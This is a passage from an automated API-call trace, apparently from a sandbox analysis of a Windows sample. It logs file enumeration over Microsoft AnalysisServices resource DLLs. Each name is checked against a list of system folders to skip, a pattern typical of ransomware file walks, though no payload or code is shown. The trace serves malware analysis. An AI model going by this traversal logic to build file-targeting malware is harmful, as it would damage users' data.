(HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0126.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e570 [0126.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0126.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.760] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5127e7d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5127e7d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5127e7d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x39078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cAlternateFileName="MIDF86~1.DLL")) returned 1 [0126.760] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2=".") returned 1 [0126.760] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="..") returned 1 [0126.760] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="...") returned 1 [0126.760] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="windows") returned -1 [0126.760] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="recovery") returned -1 [0126.760] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="perflogs") returned -1 [0126.760] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="documents and settings") returned 1 [0126.760] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.760] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="system volume information") returned -1 [0126.760] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="msocache") returned -1 [0126.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d920, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f720 [0126.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0126.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.761] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1480f75, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1480f75, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf158c060, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14030, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0126.761] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2=".") returned 1 [0126.761] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="..") returned 1 [0126.761] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="...") returned 1 [0126.761] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="windows") returned -1 [0126.761] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="recovery") returned -1 [0126.761] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="perflogs") returned -1 [0126.761] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.761] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.761] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="system volume information") returned -1 [0126.761] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="msocache") returned -1 [0126.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0126.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0126.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0126.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dba8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0126.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f030 [0126.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0126.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.761] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa879350, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa879350, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1fea98, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cAlternateFileName="MIF61E~1.DLL")) returned 1 [0126.761] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2=".") returned 1 [0126.761] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="..") returned 1 [0126.762] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="...") returned 1 [0126.762] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="windows") returned -1 [0126.762] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="recovery") returned -1 [0126.762] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="perflogs") returned -1 [0126.762] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.762] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.762] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="system volume information") returned -1 [0126.762] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="msocache") returned -1 [0126.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0126.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20d920, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0126.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0126.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20d698, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0126.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245338 [0126.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0126.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.762] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc0c33db, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc0c33db, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc0e95c0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3030, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Layout.resources.dll", cAlternateFileName="MI8E88~1.DLL")) returned 1 [0126.762] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2=".") returned 1 [0126.762] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="..") returned 1 [0126.762] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="...") returned 1 [0126.762] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="windows") returned -1 [0126.762] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="recovery") returned -1 [0126.762] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="perflogs") returned -1 [0126.762] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="documents and settings") returned 1 [0126.762] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.762] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="system volume information") returned -1 [0126.762] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="msocache") returned -1 [0126.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0126.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0126.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0126.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0126.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e8b8 [0126.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245338 | out: hHeap=0x1e0000) returned 1 [0126.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.763] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf03d07a0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf03d07a0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf03d07a0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1d038, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0126.763] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2=".") returned 1 [0126.763] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="..") returned 1 [0126.763] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="...") returned 1 [0126.763] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="windows") returned -1 [0126.763] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="recovery") returned -1 [0126.763] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="perflogs") returned -1 [0126.763] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="documents and settings") returned 1 [0126.763] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.763] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="system volume information") returned -1 [0126.763] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="msocache") returned -1 [0126.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20d920, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0126.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20d728, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0126.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0126.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0126.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.764] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56853a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28c8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.DataWarehouse.Interfaces.resources.dll", cAlternateFileName="MIE9BA~1.DLL")) returned 1 [0126.764] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2=".") returned 1 [0126.764] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="..") returned 1 [0126.764] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="...") returned 1 [0126.764] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="windows") returned -1 [0126.764] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="recovery") returned -1 [0126.764] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="perflogs") returned -1 [0126.764] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="documents and settings") returned 1 [0126.764] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.764] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="system volume information") returned -1 [0126.764] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="msocache") returned -1 [0126.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0126.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dba8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0126.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dde8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e7a0 [0126.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0126.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.765] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6a0a7fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a0a7fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a30a43, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, 